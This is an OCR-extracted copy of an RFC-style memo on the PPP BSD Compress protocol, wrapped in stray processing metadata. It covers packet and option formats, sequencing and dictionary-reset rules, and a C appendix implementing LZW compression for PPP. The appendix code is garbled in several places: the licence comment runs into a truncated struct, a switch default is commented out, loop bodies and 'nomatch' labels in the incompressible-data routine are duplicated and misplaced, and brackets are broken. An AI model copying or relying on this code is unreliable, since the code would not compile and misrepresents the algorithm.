null], [18372, 19206, null], [19206, 19821, null], [19821, 20481, null], [20481, 21166, null], [21166, 21727, null], [21727, 25514, null], [25514, 26061, null], [26061, 26817, null], [26817, 27500, null], [27500, 28098, null], [28098, 28847, null], [28847, 29546, null], [29546, 30118, null], [30118, 30763, null], [30763, 31496, null]], "google_gemma-3-12b-it_is_public_document": [[0, 82, true], [82, 968, null], [968, 1116, null], [1116, 1272, null], [1272, 1375, null], [1375, 1414, null], [1414, 4206, null], [4206, 7552, null], [7552, 11316, null], [11316, 12300, null], [12300, 13013, null], [13013, 13711, null], [13711, 14312, null], [14312, 14920, null], [14920, 15649, null], [15649, 16280, null], [16280, 16945, null], [16945, 17765, null], [17765, 18372, null], [18372, 19206, null], [19206, 19821, null], [19821, 20481, null], [20481, 21166, null], [21166, 21727, null], [21727, 25514, null], [25514, 26061, null], [26061, 26817, null], [26817, 27500, null], [27500, 28098, null], [28098, 28847, null], [28847, 29546, null], [29546, 30118, null], [30118, 30763, null], [30763, 31496, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31496, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31496, null]], "pdf_page_numbers": [[0, 82, 1], [82, 968, 2], [968, 1116, 3], [1116, 1272, 4], [1272, 1375, 5], [1375, 1414, 6], [1414, 4206, 7], [4206, 7552, 8], [7552, 11316, 9], [11316, 12300, 10], [12300, 13013, 11], [13013, 13711, 12], [13711, 14312, 13], [14312, 14920, 14], [14920, 15649, 15], [15649, 16280, 16], [16280, 16945, 17], [16945, 17765, 18], [17765, 18372, 19], [18372, 19206, 20], [19206, 19821, 21], [19821, 20481, 22], [20481, 21166, 23], [21166, 21727, 24], [21727, 25514, 25], [25514, 26061, 26], [26061, 26817, 27], [26817, 27500, 28], [27500, 28098, 29], [28098, 28847, 30], [28847, 29546, 31], [29546, 30118, 32], [30118, 30763, 33], [30763, 31496, 34]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31496, 0.02905]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
5d142d274e7e14c8436100b81b5127fcb5ded19f
PPP BSD Compression Protocol Status of This Memo This memo provides information for the Internet community. This memo does not specify an Internet standard of any kind. Distribution of this memo is unlimited. Abstract The Point-to-Point Protocol (PPP) [1] provides a standard method for transporting multi-protocol datagrams over point-to-point links. This document describes the use of the Unix Compress compression protocol for compressing PPP encapsulated packets. Table of Contents 1. Introduction ................................................. 1 1.1 Licensing ............................................. 2 2. BSD Compress Packets ....................................... 2 2.1 Packet Format ......................................... 5 3. Configuration Option Format ................................. 6 APPENDICES .................................................. 7 A. BSD Compress Algorithm ................................... 7 SECURITY CONSIDERATIONS ................................... 24 REFERENCES .................................................. 24 ACKNOWLEDGEMENTS .......................................... 24 CHAIR’S ADDRESS ............................................ 25 AUTHOR’S ADDRESS ........................................... 25 1. Introduction UNIX compress as embodied in the freely and widely distributed BSD source has the following features: - dynamic table clearing when compression becomes less effective. - automatic turning off of compression when the overall result is not smaller than the input. - dynamic choice of code width within predetermined limits. - heavily used for many years in networks, on modem and other point-to-point links to transfer netnews. - an effective code width requires less than 64KBytes of memory on both sender and receive. 1.1. Licensing BSD Unix compress command source is widely and freely available, with no additional license for many computer vendors. The included source code is based on the BSD compress command source and carries only the copyright of The Regents of the University of California. Use the code entirely at your own risk. It has no warranties or indemnifications of any sort. Note that there are patents on LZW. 2. BSD Compress Packets Before any BSD Compress packets may be communicated, PPP must reach the Network-Layer Protocol phase, and the CCP Control Protocol must reach the Opened state. Exactly one BSD Compress datagram is encapsulated in the PPP Information field, where the PPP Protocol field contains 0xFD or 0xFB. 0xFD is used when the PPP multilink protocol is not used or "above" multilink. 0xFB is used "below" multilink, to compress independently on individual links of a multilink bundle. The maximum length of the BSD Compress datagram transmitted over a PPP link is the same as the maximum length of the Information field of a PPP encapsulated packet. Only packets with PPP Protocol numbers in the range 0x0000 to 0x3FFF and neither 0xFD nor 0xFB are compressed. Other PPP packets are always sent uncompressed. Control packets are infrequent and should not be compressed for robustness. Padding BSD Compress packets require the previous negotiation of the Self-Describing-Padding Configuration Option [3] if padding is added to packets. If no padding is added, than Self-Describing-Padding is not required. Reliability and Sequencing BSD Compress requires the packets to be delivered in sequence. It relies on Reset-Request and Reset-Ack CCP packets or on renegotiation of the Compression Control Protocol [2] to indicate loss of synchronization between the transmitter and receiver. The HDLC FCS detects corrupted packets and the normal mechanisms discard them. Missing or out of order packets are detected by the sequence number in each packet. The packet sequence number ought to be checked before decoding the packet. Instead of transmitting a Reset-Request packet when detecting a decompression error, the receiver MAY momentarily force CCP to drop out of the Opened state by transmitting a new CCP Configure-Request. This method is more expensive than using Reset-Requests. When the receiver first encounters an unexpected sequence number it SHOULD send a Reset-Request CCP packet as defined in the Compression Control Protocol. When the transmitter sends the Reset-Ack or when the receiver receives a Reset-ACK, they must reset the sequence number to zero, clear the compression dictionary, and resume sending and receiving compressed packets. The receiver MUST discard all compressed packets after detecting an error and until it receives a Reset-Ack. This strategy can be thought of as abandoning the transmission of one "file" and starting the transmission of a new "file." The transmitter must clear its compression dictionary and respond with a Reset-Ack each time it receives a Reset-Request, because it cannot know if previous Reset-Acks reached the receiver. The receiver MUST clear its compression dictionary each time it receives a Reset-Ack, because the transmitter will have cleared its compression dictionary. When the link is busy, one decompression error is usually followed by several more before the Reset-Ack can be received. It is undesirable to transmit Reset-Requests more frequently than the round-trip-time of the link, because redundant Reset-Requests cause unnecessary compression dictionary clearing. The receiver MAY transmit an additional Reset-Request each time it receives a compressed or uncompressed packet until it finally receives a Reset-Ack, but the receiver ought not transmit another Reset-Request until the Reset-Ack for the previous one is late. The receiver MUST transmit enough Reset-Request packets to ensure that the transmitter receives at least one. For example, the receiver might choose to not transmit another Reset-Request until after one second (or, of course, a Reset-Ack has been received and decompression resumed). Data Expansion When significant data expansion is detected, the PPP packet MUST be sent without compression. Packets that would expand by fewer than 3 bytes SHOULD be sent without compression, but MAY be sent compressed provided the result does not exceed the MTU of the link. This makes moot standards document exegeses about exactly which bytes, such as the Protocol fields, count toward expansion. When a packet is received with PPP Protocol numbers in the range 0x0000 to 0x3FFF, (except, of course, 0xFD and 0xFB) it is assumed that the packet would have caused expansion. The packet is locally compressed to update the compression history. Sending incompressible packets in their native encapsulation avoids maximum transmission unit complications. If uncompressed packets could be larger than their native form, then it would be necessary for the upper layers of an implementation to treat the PPP link as if it had a smaller MTU, to ensure that compressed incompressible packets are never larger than the negotiated PPP MTU. Using native encapsulation for incompressible packets complicates the implementation. The transmitter and the receiver must start putting information into the compression dictionary starting with the same packets, without relying upon seeing a compressed packet for synchronization. The first few packets after clearing the dictionary are usually incompressible, and so are likely to sent in their native encapsulation, just like packets before compression is turned on. If CCP or LCP packets are handled separately from Network-Layer packets (e.g. a "daemon" for control packets and "kernel code" for data packets), care must be taken to ensure that the transmitter synchronizes clearing the dictionary with the transmission of the configure-ACK or Reset-Ack that starts compression, and the receiver must similarly ensure that its dictionary is cleared before it processes the next packet. A difficulty caused by sending data that would expand uncompressed is that the receiver must adaptively clear its dictionary at precisely the same times as the sender. In the classic BSD compression code, the dictionary clearing is signaled by the reserved code 256. Because data that would expend is sent without compression, there is no reliable way for the sender to signal explicitly when it has cleared its dictionary. This difficulty is resolved by specifying the parameters that control the dictionary clearing, and having both sender and receiver clear their dictionaries at the same times. 2.1. Packet Format A summary of the BSD Compress packet format is shown below. The fields are transmitted from left to right. ``` 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PPP Protocol | Sequence | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data ... | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ``` PPP Protocol The PPP Protocol field is described in the Point-to-Point Protocol Encapsulation [1]. When the BSD Compress compression protocol is successfully negotiated by the PPP Compression Control Protocol [2], the value of the protocol field is 0xFD or 0xFB. This value MAY be compressed when Protocol-Field-Compression is negotiated. Sequence The sequence number is sent most significant octet first. It starts at 0 when the dictionary is cleared, and is incremented by 1 after each packet, including uncompressed packets. The sequence number after 65535 is zero. In other words, the sequence number "wraps" in the usual way. The sequence number ensures that lost or out of order packets do not cause the compression databases of the peers to become unsynchronized. When an unexpected sequence number is encountered, the dictionaries must be resynchronized with a CCP Reset-Request or Configure-Request. The packet sequence number can be checked before a compressed packet is decoded. Data The compressed PPP encapsulated packet, consisting of the Protocol and Data fields of the original, uncompressed packet follows. The Protocol field compression MUST be applied to the protocol field in the original packet before the sequence number is computed or the entire packet is compressed, regardless of whether the PPP protocol field compression has been negotiated. Thus, if the original protocol number was less than 0x100, it must be compressed to a single byte. The format of the compressed data is more precisely described by the example code in the "BSD Compress Algorithm" appendix. 3. Configuration Option Format Description The CCP BSD Compress Configuration Option negotiates the use of BSD Compress on the link. By default or ultimate disagreement, no compression is used. A summary of the BSD Compress Configuration Option format is shown below. The fields are transmitted from left to right. ``` 0 1 2 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 ++++++++++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Length | Vers| Dict | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ``` Type 21 or 0x15 for BSD compress. Length 3 Vers Must be the binary number 001. Dict The size in bits of the largest code used. It can range from 9 to 16. A common choice is 12. The code included below can support code sizes from 9 to 15. It is convenient to treat the byte containing the Vers and Dict fields as a single field with legal values ranging from 0x29 to 0x30. Note that the peer receiving compressed data must use the same code size as the peer sending data. It is not practical for the receiver to use a larger dictionary or code size, because both dictionaries must be cleared at the same time, even when the data is not compressible, so that uncompressed packets are being sent, and so the receiver cannot receive LZW "CLEAR" codes. When a received Configure-Request specifies a smaller dictionary than the local preference, it is often best to accept it instead of using a Configure-Nak to ask the peer to specify a larger dictionary. A. BSD Compress Algorithm This code is the core of a commercial workstation implementation. It was derived by transliterating the 4.*BSD compress command. It is unlikely to be of direct use in any system that does not have the same mixture of mbufs and STREAMS buffers. It may need to be retuned for CPU’s other than RISC’s with many registers and certain addressing modes. However, the code is the most accurate and unambiguous way of defining the changes to the BSD compress source required to apply it to a stream instead of a file. Note that it assumes a "short" contains 16 bits and an "int" contains at least 32 bits. Where it would matter if more than 32 bits were in an "int" or "long," __uint32_t is used instead. /* Because this code is derived from the 4.3BSD compress source: * * * Copyright (c) 1985, 1986 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * James A. Woods, derived from original work by Spencer Thomas * and Joseph Orost. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgement: struct bsd_db { int totlen; /* length of this structure */ u_int hsize; /* size of the hash table */ u_char hshift; /* used in hash function */ u_char n_bits; /* current bits/code */ u_char debug; u_char unit; u_short mru; u_short seqno; /* # of last byte of packet */ u_int maxmaxcode; /* largest valid code */ u_int max_ent; /* largest code in use */ u_int in_count; /* uncompressed bytes */ u_int bytes_out; /* compressed bytes */ u_int ratio; /* recent compression ratio */ u_int checkpoint; /* when to next check ratio */ int clear_count; /* times dictionary cleared */ int incomp_count; /* incompressible packets */ int decomp_count; /* packets decompressed */ int overshoot; /* excess decompression buf */ int undershoot; /* insufficient decomp. buf */ u_short *lens; /* array of lengths of codes */ struct bsd_dict { union { /* hash value */ __uint32_t fcode; } } #ifdef BSD_LITTLE_ENDIAN PPP "BSD compress" compression * The differences between this compression and the classic BSD LZW * source are obvious from the requirement that the classic code worked * with files while this handles arbitrarily long streams that * are broken into packets. They are: * * When the code size expands, a block of junk is not emitted by * the compressor and not expected by the decompressor. * * New codes are not necessarily assigned every time an old * code is output by the compressor. This is because a packet * end forces a code to be emitted, but does not imply that a * new sequence has been seen. * * The compression ratio is checked at the first end of a packet * after the appropriate gap. Besides simplifying and speeding * things up, this makes it more likely that the transmitter * and receiver will agree when the dictionary is cleared when * compression is not going well. /* * the next two codes should not be changed lightly, as they must not * lie within the contiguous general code space. */ #define CLEAR 256 /* table clear output code */ #define FIRST 257 /* first free entry */ #define LAST 255 #define BSD_INIT_BITS MIN_BSD_BITS #define MAXCODE(b) ((1 << (b)) - 1) #define BADCODEM1 MAXCODE(MAX_BSD_BITS); #define BSD_HASH(prefix,suffix,hshift) ((((__uint32_t)(suffix)) << (hshift)) ^ ((__uint32_t)(prefix)) #define BSD_KEY(prefix,suffix) ((((__uint32_t)(suffix)) << 16) + ((__uint32_t)(prefix)) #define CHECK_GAP 10000 /* Ratio check interval */ #define RATIO_SCALE_LOG 8 #define RATIO_SCALE (1<<RATIO_SCALE_LOG) #define RATIO_MAX (0x7fffffff>>RATIO_SCALE_LOG) /* clear the dictionary */ static void pf_bsd_clear(struct bsd_db *db) { db->clear_count++; db->max_ent = FIRST-1; db->n_bits = BSD_INIT_BITS; db->ratio = 0; db->bytes_out = 0; db->in_count = 0; db->incomp_count = 0; db->decomp_count = 0; db->overshoot = 0; db->undershoot = 0; db->checkpoint = CHECK_GAP; } /* If the dictionary is full, then see if it is time to reset it. */ * Compute the compression ratio using fixed-point arithmetic * with 8 fractional bits. * Since we have an infinite stream instead of a single file, * watch only the local compression ratio. * * Since both peers must reset the dictionary at the same time even in * the absence of CLEAR codes (while packets are incompressible), they * must compute the same ratio. */ static int pf_bsd_check(struct bsd_db *db) { register u_int new_ratio; if (db->in_count >= db->checkpoint) { /* age the ratio by limiting the size of the counts */ if (db->in_count >= RATIO_MAX || db->bytes_out >= RATIO_MAX) { db->in_count -= db->in_count/4; db->bytes_out -= db->bytes_out/4; } db->checkpoint = db->in_count + CHECK_GAP; } if (db->max_ent >= db->maxmaxcode) { /* Reset the dictionary only if the ratio is * worse, or if it looks as if it has been * poisoned by incompressible data. * * This does not overflow, because * db->in_count <= RATIO_MAX. */ new_ratio = db->in_count<<RATIO_SCALE_LOG; if (db->bytes_out != 0) new_ratio /= db->bytes_out; if (new_ratio < db->ratio || new_ratio < 1*RATIO_SCALE) { pf_bsd_clear(db); return 1; } } db->ratio = new_ratio; return 0; } /* Initialize the database. */ struct bsd_db * pf_bsd_init(struct bsd_db *db, /* initialize this database */ int unit, /* for debugging */ int bits, /* size of LZW code word */ int mru) /* MRU for input, 0 for output*/ { register int i; register u_short *lens; register u_int newlen, hsize, hshift, maxmaxcode; switch (bits) { case 9: /* needs 82152 for both comp &*/ case 10: /* needs 84144 decomp*/ case 11: /* needs 88240 */ case 12: /* needs 96432 */ hsize = 5003; hshift = 4; break; case 13: /* needs 176784 */ hsize = 9001; hshift = 5; break; case 14: /* needs 353744 */ hsize = 18013; hshift = 6; break; case 15: /* needs 691440 */ hsize = 35023; hshift = 7; break; case 16: /* needs 1366160--far too much*/ hsize = 69001; /* */ hshift = 8; /* */ break; /* * default: if (db) { if (db->lens) kern_free(db->lens); kern_free(db); } return 0; } maxmaxcode = MAXCODE(bits); newlen = sizeof(*db) + (hsize-1)*(sizeof(db->dict[0])); if (db) { lens = db->lens; } if (db->totlen != newlen) { if (lens) kern_free(lens); kern_free(db); db = 0; } if (!db) { db = (struct bsd_db*)kern_malloc(newlen); if (!db) return 0; if (mru == 0) { lens = 0; } else { lens = (u_short*)kern_malloc((maxmaxcode+1) * sizeof(*lens)); if (!lens) { kern_free(db); return 0; } i = LAST+1; while (i != 0) lens[--i] = 1; } i = hsize; while (i != 0) { db->dict[--i].codem1 = BADCODEM1; db->dict[i].cptr = 0; } } bzero(db,sizeof(*db)-sizeof(db->dict)); db->lens = lens; db->unit = unit; db->mru = mru; db->hsize = hsize; db->hshift = hshift; db->maxmaxcode = maxmaxcode; db->clear_count = -1; pf_bsd_clear(db); return db; /* compress a packet * Assume the protocol is known to be >= 0x21 and < 0xff. One change from the BSD compress command is that when the code size expands, we do not output a bunch of padding. ```c int /* new slen */ pf_bsd_comp(struct bsd_db *db, u_char *cp_buf, /* compress into here */ int proto, /* this original PPP protocol */ struct mbuf *m, /* from here */ int slen) { register int hshift = db->hshift; register u_int max_ent = db->max_ent; register u_int n_bits = db->n_bits; register u_int bitno = 32; register __uint32_t accum = 0; register struct bsd_dict *dictp; register __uint32_t fcode; register u_char c; register int hval, disp, ent; register u_char *rptr, *wptr; struct mbuf *n; #define OUTPUT(ent) { \ bitno -= n_bits; \ accum |= ((ent) << bitno); \ do { \ *wptr++ = accum>>24; \ accum <<= 8; \ bitno += 8; \ } while (bitno <= 24); } /* start with the protocol byte */ ent = proto; db->in_count++; /* install sequence number */ cp_buf[0] = db->seqno>>8; cp_buf[1] = db->seqno; db->seqno++; wptr = &cp_buf[2]; slen = m->m_len; db->in_count += slen; rptr = mtod(m, u_char*); n = m->m_next; for (;;) { ``` if (slen == 0) { if (!n) break; slen = n->m_len; rptr = mtod(n, u_char*); n = n->m_next; if (!slen) continue; /* handle 0-length buffers*/ db->in_count += slen; } slen--; c = *rptr++; fcode = BSD_KEY(ent,c); hval = BSD_HASH(ent,c,hshift); dictp = &db->dict[hval]; /* Validate and then check the entry. */ if (dictp->codem1 >= max_ent) goto nomatch; if (dictp->f.fcode == fcode) { ent = dictp->codem1+1; continue; /* found (prefix,suffix) */ } /* continue probing until a match or invalid entry */ disp = (hval == 0) ? 1 : hval; do { hval += disp; if (hval >= db->hsize) hval -= db->hsize; dictp = &db->dict[hval]; if (dictp->codem1 >= max_ent) goto nomatch; } while (dictp->f.fcode != fcode); ent = dictp->codem1+1; /* found (prefix,suffix) */ continue; nomatch: OUTPUT(ent); /* output the prefix */ /* code -> hashtable */ if (max_ent < db->maxmaxcode) { struct bsd_dict *dictp2; /* expand code size if needed */ if (max_ent >= MAXCODE(n_bits)) db->n_bits = ++n_bits; ... /* Invalidate old hash table entry using this code, and then take it over. */ dictp2 = &db->dict[max_ent+1]; if (db->dict[dictp2->cptr].codem1 == max_ent) db->dict[dictp2->cptr].codem1=BADCODEM1; dictp2->cptr = hval; dictp->codem1 = max_ent; dictp->f.fcode = fcode; db->max_ent = ++max_ent; } ent = c; } OUTPUT(ent); /* output the last code */ db->bytes_out += (wptr-&cp_buf[2] /* count complete bytes */ + (32-bitno+7)/8); if (pf_bsd_check(db)) OUTPUT(CLEAR); /* do not count the CLEAR */ /* Pad dribble bits of last code with ones. */ * Do not emit a completely useless byte of ones. */ if (bitno != 32) *wptr++ = (accum | (0xff << (bitno-8))) >> 24; /* Increase code size if we would have without the packet boundary and as the decompressor will. */ if (max_ent >= MAXCODE(n_bits) && max_ent < db->maxmaxcode) db->n_bits++; return (wptr - cp_buf); #undef OUTPUT } /* Update the "BSD Compress" dictionary on the receiver for incompressible data by pretending to compress the incoming data. */ void pf_bsd_incomp(struct bsd_db *db, mblk_t *dmsg, u_int ent) /* start with protocol byte */ { register u_int hshift = db->hshift; register u_int max_ent = db->max_ent; register u_int n_bits = db->n_bits; register struct bsd_dict *dictp; register __uint32_t fcode; register u_char c; register int hval, disp; register int slen; register u_int bitno = 7; register u_char *rptr; db->incomp_count++; db->in_count++; /* count protocol as 1 byte */ db->seqno++; rptr = dmsg->b_rptr+PPP_BUF_HEAD_INFO; for (;;) { slen = dmsg->b_wptr - rptr; if (slen == 0) { dmsg = dmsg->b_cont; if (!dmsg) break; rptr = dmsg->b_rptr; continue; /* skip zero-length buffers */ } db->in_count += slen; do { c = *rptr++; fcode = BSD_KEY(ent,c); hval = BSD_HASH(ent,c,hshift); dictp = &db->dict[hval]; /* validate and then check the entry */ if (dictp->codem1 >= max_ent) goto nomatch; if (dictp->f.fcode == fcode) { ent = dictp->codem1+1; continue; /* found (prefix,suffix) */ } /* continue until match or invalid entry */ disp = (hval == 0) ? 1 : hval; do { hval += disp; if (hval >= db->hsize) hval -= db->hsize; dictp = &db->dict[hval]; } } while (hval < max_ent); } nomatch: /* error */ if (dictp->codem1 >= max_ent) goto nomatch; } while (dictp->f.fcode != fcode); ent = dictp->codem1+1; continue; /* found (prefix,suffix) */ nomatch: /* output (count) the prefix */ bitno += n_bits; /* code -> hashtable */ if (max_ent < db->maxmaxcode) { struct bsd_dict *dictp2; /* expand code size if needed */ if (max_ent >= MAXCODE(n_bits)) db->n_bits = ++n_bits; /* Invalidate previous hash table entry * assigned this code, and then take it over */ dictp2 = &db->dict[max_ent+1]; if (db->dict[dictp2->cptr].codem1==max_ent) db->dict[dictp2->cptr].codem1=BADCODEM1; dictp2->cptr = hval; dictp->codem1 = max_ent; dictp->f.fcode = fcode; db->max_ent = ++max_ent; db->lens[max_ent] = db->lens[ent]+1; } ent = c; } while (--slen != 0); } bitno += n_bits; /* output (count) last code */ db->bytes_out += bitno/8; (void) pf_bsd_check(db); /* Increase code size if we would have without the packet * boundary and as the decompressor will. */ if (max_ent >= MAXCODE(n_bits) && max_ent < db->maxmaxcode) db->n_bits++; } /* Decompress "BSD Compress" */ mblk_t* /* 0=failed, so zap CCP */ pf_bsd_decomp(struct bsd_db *db, mblk_t *cmsg) { register u_int max_ent = db->max_ent; register __uint32_t accum = 0; register u_int bitno = 32; /* 1st valid bit in accum */ register u_int n_bits = db->n_bits; register u_int tgtbitno = 32-n_bits; /* bitno when accum full */ register struct bsd_dict *dictp; register int explen, i; register u_int incode, oldcode, finchar; register u_char *p, *rptr, *rptr9, *wptr0, *wptr; mblk_t *dmsg, *dmsg1, *bp; db->decomp_count++; rptr = cmsg->b_rptr; ASSERT(cmsg->b_wptr >= rptr+PPP_BUF_MIN); ASSERT(PPP_BUF_ALIGN(rptr)); rptr += PPP_BUF_MIN; /* get the sequence number */ i = 0; explen = 2; do { while (rptr >= cmsg->b_wptr) { bp = cmsg; cmsg = cmsg->b_cont; freeb(bp); if (!cmsg) { if (db->debug) printf("bsd_decomp%d: missing" " %d header bytes\n", db->unit, explen); db->unit, explen); return 0; } rptr = cmsg->b_rptr; } i = (i << 8) + *rptr++;} while (--explen != 0); if (i != db->seqno++) { freemsg(cmsg); if (db->debug) printf("bsd_decomp%d: bad sequence number 0x%x" " instead of 0x%x\n", db->unit, i, db->seqno-1); return 0; } } /* Guess how much memory we will need. Assume this packet was * compressed by at least 1.5X regardless of the recent ratio. */ if (db->ratio > (RATIO_SCALE*3)/2) explen = (msgdsize(cmsg)*db->ratio)/RATIO_SCALE; else explen = (msgdsize(cmsg)*3)/2; if (explen > db->mru) explen = db->mru; dmsg = dmsg1 = allocb(explen+PPP_BUF_HEAD_INFO, BPRI_HI); if (!dmsg1) { freemsg(cmsg); return 0; } wptr = dmsg1->b_wptr; {(struct ppp_buf*)wptr)->type = BEEP_FRAME; /* the protocol field must be compressed */ {(struct ppp_buf*)wptr)->proto = 0; wptr += PPP_BUF_HEAD_PROTO+1; rptr9 = cmsg->b_wptr; db->bytes_out += rptr9-rptr; wptr0 = wptr; explen = dmsg1->b_datap->db_lim - wptr; oldcode = CLEAR; for (;;) { if (rptr >= rptr9) { bp = cmsg; cmsg = cmsg->b_cont; freeb(bp); if (!cmsg) /* quit at end of message */ break; rptr = cmsg->b_rptr; rptr9 = cmsg->b_wptr; db->bytes_out += rptr9-rptr; continue; /* handle 0-length buffers */ } /* Accumulate bytes until we have a complete code. * Then get the next code, relying on the 32-bit, * unsigned accum to mask the result. */ bitno -= 8; accum |= *rptr++ << bitno; if (tgtbitno < bitno) continue; incode = accum >> tgtbitno; accum <<= n_bits; bitno += n_bits; if (incode == CLEAR) { /* The dictionary must only be cleared at * the end of a packet. But there could be an * empty message block at the end. */ if (rptr != rptr9 || cmsg->b_cont != 0) { cmsg->b_rptr = rptr; i = msgdsize(cmsg); if (i != 0) { freemsg(dmsg); freemsg(cmsg); if (db->debug) printf("bsd_decomp%d: " "bad CLEAR\n", db->unit); return 0; } } pf_bsd_clear(db); freemsg(cmsg); wptr0 = wptr; break; } /* Special case for KwKwK string. */ if (incode > max_ent) { if (incode > max_ent+2 || incode > db->maxmaxcode || oldcode == CLEAR) { freemsg(dmsg); freemsg(cmsg); if (db->debug) printf("bsd_decomp%d: bad code %x\n", db->unit, incode); return 0; } i = db->lens[oldcode]; /* do not write past end of buf */ explen -= i+1; if (explen < 0) { db->undershoot -= explen; db->in_count += wptr-wptr0; dmsg1->b_wptr = wptr; CK_WPTR(dmsg1); explen = MAX(64,i+1); bp = allocb(explen, BPRI_HI); if (!bp) { freemsg(cmsg); freemsg(dmsg); return 0; } dmsg1->b_cont = bp; dmsg1 = bp; wptr0 = wptr = dmsg1->b_wptr; explen=dmsg1->b_datap->db_lim-wptr-(i+1); } p = (wptr += i); *wptr++ = finchar; finchar = oldcode; } else { i = db->lens[finchar = incode]; explen -= i; if (explen < 0) { db->undershoot -= explen; db->in_count += wptr-wptr0; dmsg1->b_wptr = wptr; CK_WPTR(dmsg1); explen = MAX(64,i); bp = allocb(explen, BPRI_HI); if (!bp) { freemsg(dmsg); freemsg(cmsg); return 0; } dmsg1->b_cont = bp; dmsg1 = bp; wptr0 = wptr = dmsg1->b_wptr; explen = dmsg1->b_datap->db_lim-wptr-i; } p = (wptr += i); } /* decode code and install in decompressed buffer */ while (finchar > LAST) { dictp = &db->dict[db->dict[finchar].cptr]; *--p = dictp->f.hs.suffix; finchar = dictp->f.hs.prefix; } *--p = finchar; /* If not first code in a packet, and * if not out of code space, then allocate a new code. * Keep the hash table correct so it can be used * with uncompressed packets. */ if (oldcode != CLEAR && max_ent < db->maxmaxcode) { struct bsd_dict *dictp2; __uint32_t fcode; int hval, disp; fcode = BSD_KEY(oldcode,finchar); hval = BSD_HASH(oldcode,finchar,db->hshift); dictp = &db->dict[hval]; /* look for a free hash table entry */ if (dictp->codem1 < max_ent) { disp = (hval == 0) ? 1 : hval; do { hval += disp; if (hval >= db->hsize) hval -= db->hsize; dictp = &db->dict[hval]; } while (dictp->codem1 < max_ent); } /* Invalidate previous hash table entry * assigned this code, and then take it over */ dictp2 = &db->dict[max_ent+1]; if (db->dict[dictp2->cptr].codem1 == max_ent) { db->dict[dictp2->cptr].codem1=BADCODEM1; } dictp2->cptr = hval; dictp->codem1 = max_ent; dictp->f.fcode = fcode; db->max_ent = ++max_ent; db->lens[max_ent] = db->lens[oldcode]+1; /* Expand code size if needed. */ if (max_ent >= MAXCODE(n_bits) && max_ent < db->maxmaxcode) { db->n_bits = ++n_bits; tgtbitno = 32-n_bits; } } oldcode = incode; } db->in_count += wptr-wptr0; dmsg1->b_wptr = wptr; CK_WPTR(dmsg1); db->overshoot += explen; /* Keep the checkpoint right so that incompressible packets * clear the dictionary at the right times. */ if (pf_bsd_check(db) && db->debug) { printf("bsd_decomp%d: peer should have " "cleared dictionary\n", db->unit); } return dmsg; } Security Considerations Security issues are not discussed in this memo. References Acknowledgments William Simpson provided and supported the very valuable idea of not using any additional header bytes for incompressible packets. Chair’s Address The working group can be contacted via the current chair: Karl Fox Ascend Communications 3518 Riverside Drive, Suite 101 Columbus, Ohio 43221 EMail: karl@ascend.com Author’s Address Questions about this memo can also be directed to: Vernon Schryver 2482 Lee Hill Drive Boulder, Colorado 80302 EMail: vjs@rhyolite.com
{"Source-Url": "https://tools.ietf.org/pdf/rfc1977.pdf", "len_cl100k_base": 8881, "olmocr-version": "0.1.53", "pdf-total-pages": 25, "total-fallback-pages": 0, "total-input-tokens": 46748, "total-output-tokens": 10797, "length": "2e13", "weborganizer": {"__label__adult": 0.0003247261047363281, "__label__art_design": 0.0002378225326538086, "__label__crime_law": 0.0003955364227294922, "__label__education_jobs": 0.00023794174194335935, "__label__entertainment": 0.00010222196578979492, "__label__fashion_beauty": 0.0001264810562133789, "__label__finance_business": 0.0002751350402832031, "__label__food_dining": 0.0003504753112792969, "__label__games": 0.0007338523864746094, "__label__hardware": 0.005588531494140625, "__label__health": 0.000339508056640625, "__label__history": 0.00022971630096435547, "__label__home_hobbies": 8.237361907958984e-05, "__label__industrial": 0.0006494522094726562, "__label__literature": 0.00020503997802734375, "__label__politics": 0.00023829936981201172, "__label__religion": 0.00042128562927246094, "__label__science_tech": 0.08209228515625, "__label__social_life": 5.924701690673828e-05, "__label__software": 0.023529052734375, "__label__software_dev": 0.8828125, "__label__sports_fitness": 0.00031375885009765625, "__label__transportation": 0.000644683837890625, "__label__travel": 0.0001856088638305664}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 34744, 0.01972]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 34744, 0.91465]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": 